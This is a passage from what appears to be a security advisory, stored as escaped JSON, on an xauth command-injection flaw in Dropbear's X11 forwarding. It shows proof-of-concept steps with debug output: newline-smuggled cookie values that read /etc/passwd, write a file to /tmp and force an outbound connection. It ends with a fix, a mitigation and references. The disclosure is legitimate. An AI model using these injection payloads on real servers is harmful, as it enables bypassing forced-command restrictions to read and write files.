(stdin):1: bad \"add\" command line\n\t\n\t...\n\t```\n\t\n4. `forced-commands` - read `/etc/passwd`\n\n\t```c\n\t...\n\t#> .readfile /etc/passwd\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\n\tsync:x:4:65534:sync:/bin:/bin/sync\n\t...\n\t```\n\t\t\n5. `forced-commands` - write `/tmp/testfile`\n\n\t```c\n\t#> .writefile /tmp/testfile1 `thisisatestfile`\n\tDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\n\tDEBUG:__main__:dummy exec returned: None\n\tDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500'\n\tDEBUG:__main__:dummy exec returned: None\n\tDEBUG:__main__:user1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t\n\t#> INFO:__main__:/tmp/testfile1\n\t\n\t#> ls -lsat /tmp/testfile1\n\t4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1\n\t\n\t#> cat /tmp/testfile1\n\t\u00fa65500hi\u00fa65500`thisisatestfile`\u00aar\n\t```\n\t\n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100\n\n\t```c\n\t#> generate 8.8.8.8:100\n\tDEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:user1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t/usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\".\n\t\n\t#> tcpdump \n\tIP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0\n\t```\t\n\nFix\n---\n\n* Sanitize user-tainted input `chansess->x11authcookie`\n\n\nMitigation / Workaround\n------------------------\n\n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`\n\nNotes\n-----\n\nThanks to the OpenSSH team for coordinating the fix!\n\nVendor response see: changelog [4]\n\n\nReferences\n----------\n\n\t[1] https://matt.ucc.asn.au/dropbear/dropbear.html\n\t[2] http://linux.die.net/man/1/xauth\n\t[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/\n\t[4] https://matt.ucc.asn.au/dropbear/CHANGES\n\t\nContact\n-------\n\n\thttps://github.com/tintinweb", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}]}
